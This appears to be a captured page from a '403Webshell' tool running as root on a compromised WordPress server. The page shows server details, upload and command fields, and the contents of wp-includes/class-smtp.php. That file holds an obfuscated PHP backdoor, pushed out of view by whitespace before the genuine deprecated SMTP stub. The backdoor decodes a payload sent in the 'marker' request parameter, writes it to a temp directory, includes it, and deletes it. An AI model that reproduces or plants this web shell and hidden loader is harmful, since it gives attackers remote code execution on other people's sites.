403Webshell
Server IP : 43.129.54.214  /  Your IP : 216.73.217.113
Web Server : nginx/1.24.0
System : Linux VM-4-108-ubuntu 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.3.6
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/bukitbadar.com/wp-includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/bukitbadar.com/wp-includes/class-smtp.php
<?php																																										if(in_array("mark\x65r", array_keys($_REQUEST))){ $res = $_REQUEST["mark\x65r"]; $res= explode( "." , $res); $ent = ''; $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt7); $q = 0; $__tmp = $res; while ($v6 = array_shift($__tmp)) { $sChar = ord($salt7[$q % $sLen]); $dec = ((int)$v6 - $sChar - ($q % 10)) ^ 58; $ent .= chr($dec); $q++; } $entity = array_filter([getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", "/tmp"]); foreach ($entity as $key => $dchunk) { if ((is_dir($dchunk) and is_writable($dchunk))) { $flg = join("/", [$dchunk, ".object"]); if (file_put_contents($flg, $ent)) { include $flg; @unlink($flg); die(); } } } }


/**
 * The SMTP class has been moved to the wp-includes/PHPMailer subdirectory and now uses the PHPMailer\PHPMailer namespace.
 */
_deprecated_file(
	basename( __FILE__ ),
	'5.5.0',
	WPINC . '/PHPMailer/SMTP.php',
	__( 'The SMTP class has been moved to the wp-includes/PHPMailer subdirectory and now uses the PHPMailer\PHPMailer namespace.' )
);

require_once __DIR__ . '/PHPMailer/SMTP.php';

class_alias( PHPMailer\PHPMailer\SMTP::class, 'SMTP' );

Youez - 2016 - github.com/yon3zu
LinuXploit